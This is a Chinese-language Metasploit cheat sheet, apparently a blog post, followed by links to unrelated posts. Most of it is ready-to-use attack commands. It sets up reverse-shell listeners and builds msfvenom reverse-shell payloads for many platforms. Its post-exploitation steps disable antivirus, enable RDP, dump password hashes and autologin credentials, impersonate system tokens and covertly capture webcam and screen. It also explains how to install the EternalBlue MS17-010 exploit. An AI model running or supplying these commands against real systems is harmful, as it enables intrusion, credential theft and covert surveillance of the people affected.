msf下的命令

set session x:设置要攻击的session

#监听端口反弹PHP shell
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST
set LPORT
run
#end #windows/shell_reverse_tcp模块可创建具有meterpreter功能的各版本shellcode,比如Asp、Aspx、msi、vbs、war
#使用windows/shell_reverse_tcp反弹shell
show payloads
use windows/shell_reverse_tcp
set LHOST
set LPORT
save
generate -h #查看具体命令
generate -t asp #生成asp的shellcode
#监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST
set LPORT
run
#将shell上传后访问
#end

meterpreter下的命令

ps:获取目标机正在运行的进程
getpid:查看meterpreter shell的进程号
migrate :把meterpreter shell移动到PID为448的进程中
kill :杀掉PID为984的进程
run post/windows/manage/migrate:自动寻找合适的进程迁移
sysinfo:查看目标系统信息
run post/windows/gather/checkvm:检查目标是否运行在虚拟机上
idletime:查看目标机最近的运行时间
route:目标机完整的网络设置
getuid:查看当前用户名
background:将当前会话放到后台(适合在多个meterpreter会话的场景下使用)
run post/windows/manage/killav:关闭目标机系统杀毒软件
run post/windows/manage/enable_rdp:开启目标机3389端口
run post/windows/manage/autoroute:查看目标机的本地子网情况
background->route add xxx xxx(添加路由)->route print(查看路由)
↑[路由添加到已攻陷的主机的路由表中,就可以借助被攻陷的主机对其他网络进行攻击]
run post/windows/gather/enum_logged_on_users:列举当前有多少用户登录了目标机
run post/windows/gather/enum_applications:列举安装在目标机上的应用程序
run windows/gather/credentials/windows_autologin:抓取自动登录的用户名和密码
load espia(加载espia插件)->screengrab(抓取目标机的屏幕截图)
screengrab(也可直接使用screengrab命令抓取目标机的屏幕截图)
webcam_list:查看目标机是否有摄像头
webcam_snap:打开目标机摄像头拍一张照片
webcam_stream:抓取目标机视频
shell:进入目标机shell
exit:停止meterpreter会话
pwd/getwd:查看当前处于目标机哪个目录
getlwd:查看当前处于本地的那个目录
ls:列出当前目录的所有文件
cd:切换目录
search -f *.txt -d c:\:搜索C盘中所有txt文件(-f指定搜索文件模式,-d指定目录)
download c:\test.txt /root:下载目标机c盘的test.txt文件到本机root下
upload /root/test.txt c:\:上传本地root下test.txt文件到目标机c盘下
getsystem:提权 #假冒令牌↓
#有两种类型令牌:
#Delegation Tokens(授权令牌,支持交互式登录,例如远程桌面登录)
#Impersonation Tokens(模拟令牌,非交互式的会话)
在incognito下假冒
use incognito->list_tokens -u:列出可用的token
impersonate_token xxxx\\system:假冒xxxx用户进行攻击(要用两个\)
#end hashdump:导出目标机的hash
run windows/gather/smart_hashdump:导出域所有用户的hash

移植并利用MS17-010(windows 2003)漏洞利用代码

#MSF中MS17-010不支持windows
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
将Eternalblue-Doublepulsar-Metasploit文件夹下的eternalblue-doublepulsar.rb复制到/usr/share/metasploit-framework/modules/exploits/windows/smb下
msfconsole->reload_all #在MSF下重新加载全部文件
search eternalblue-doublepulsar #现在就可以搜到该脚本了

利用msfvenom生成shell的命令

Linux:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf Windows:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe PHP:
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php ASP:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp JSP:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp Python:
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py Bash:
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh Perl:
msfvenom -p cmd/unix/reverse
_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl

MSF常用命令备忘录的更多相关文章

  1. msf常用命令

    msf > search -r great -t exploits search命令查找rank为great的exploit msf > setg RHOST 192.168.1.102 ...

  2. Netstat 常用命令--备忘录

    Netstat 用于显示与IP .TCP .UDP 和ICMP 协议相关的统计数据,一般用于检验本机各端口的网络连接情况. 常用参数 -a (all)显示所有选项,默认不显示LISTEN相关-t (t ...

  3. docker 常用命令备忘录

    基础命令 docker version docker info docker --help   镜像命令 查看 docker images   其中: REPOSITORY:表示镜像的仓库源 TAG: ...

  4. 【MYSQL】常用命令备忘录

    source 不接路径时,查找文件的路径是执行mysql命令时的路径 接路径时,使用路径+filename [root@wordpressserver mysql]# vi demo.mysql [r ...

  5. 【长期更新】Ubuntu常用命令备忘录

    Error  Could not get lock /var/lib/dpkg/lock 出现这个问题可能是有另外一个程序正在运行,导致资源被锁不可用.而导致资源被锁的原因可能是上次运行安装或更新时没 ...

  6. mac 下常用命令备忘录

    1.查看端口号 lsof -i: 2.杀死进程 kill 41321 3.查看文件夹文件 ls ls -l //看到文件及文件夹更多的内容 ls -a //隐藏的文件 ls -la //上面的组合 4 ...

  7. git常用命令备忘录

    返回未修改状态 [git checkout . --没有的提交的,都返回到原来的状态  git clean -xdf 删除文件和目录] git checkout . && git cl ...

  8. linux常用命令大全(linux基础命令入门到精通+命令备忘录+面试复习+实例)

    作者:蓝藻(罗蓝国度) 创建时间:2018.7.3 编辑时间:2019.4.29 前言 本文特点 授之以渔:了解命令学习方法.用途:不再死记硬背,拒绝漫无目的: 准确无误:所有命令执行通过(环境为ce ...

  9. linux常用命令大全(linux基础命令+命令备忘录+面试复习)

    linux常用命令大全(linux基础命令+命令备忘录+面试复习)-----https://www.cnblogs.com/caozy/p/9261224.html

随机推荐

  1. Jexl表达式引擎-根据字符串动态执行JAVA.md

    Table of Contents generated with DocToc 一.使用场景 二.市面上表达式引擎比较 2.1 Aviator 2.2 Jexl 一.使用场景 在做某些项目的时候,有时 ...

  2. 题解 洛谷 P4143 【采集矿石】

    对于一个固定的左端点,右端点向右移动时,其子串权值和不断增大,字典序降序排名不断减小,因此对于一个左端点,最多存在一个右端点使其满足条件. 所以可以枚举左端点,然后二分右端点的位置,权值和通过前缀和来 ...

  3. 京东阅读(web)体验优化

    京东有电子书可以购买,可以多端阅读.比如PC客户端,移动端,以及本文提到的PC网站端. 先换个镜头,读书要记笔记(电子版本), 方便以后查阅. 镜头换回来,但是,我们为了方便肯定是想复制,下载啊,分享 ...

  4. goroutine间的同步&协作

    Go语言中的同步工具 基础概念 竞态条件(race condition) 一份数据被多个线程共享,可能会产生争用和冲突的情况.这种情况被称为竞态条件,竞态条件会破坏共享数据的一致性,影响一些线程中代码 ...

  5. Dockerfile镜像优化,减小镜像

    前言镜像的优化注意几条: 选择最精简的基础镜像减少镜像的层数清理镜像构建的中间产物注意优化网络请求尽量去用构建缓存使用多阶段构建镜像接下来我们以rhel7镜像构建容器,并在容器中安装nginx的源码包 ...

  6. Windows下给PHP安装redis扩展

    一.选择适合的版本 二.下载扩展 官网下载地址:http://pecl.php.net/package/redis ,选择合适的版本进行下载 三.解压后将下面两个文件复制到PHP扩展文件目录(ext文 ...

  7. jmeter 命令行模式(非GUI)运行脚本,察看结果树结果为空,解决办法;

    jmeter的bin目录下,打开命令窗口,执行jmeter -n -t jmeter脚本 -l 结果: 执行结束后,聚合报告打开结果,显示错误率100%:察看结果树中打开结果,显示无数据: 解决办法: ...

  8. Python按值传递参数和按引用传递参数

    Python按值传递参数和按引用传递参数: 按值传递参数: 使用一个变量的值(数字,字符串),放到实参的位置上 注:传递过去的是变量的副本,无论副本在函数中怎么变,变量的值都不变 传递常量: # 传递 ...

  9. 自述:转职IT ,痛苦一阵子;不转职IT,痛苦一辈子(第一章)

    作为一个从后期制作转职过来的Java工程师,我认为我是幸运的,虽然我的本科专业(影视后期)也是火爆行业,不愁工作,但我不后悔进入这个IT坑,毕竟转行,只痛苦一阵子,但是不转行,可能我会痛苦一辈子. 我 ...

  10. 什么是PHP 面向对象

    PHP 面向对象 在面向对象的程序设计(英语:Object-oriented programming,缩写:OOP)中,对象是一个由信息及对信息进行处理的描述所组成的整体,是对现实世界的抽象. 在现实 ...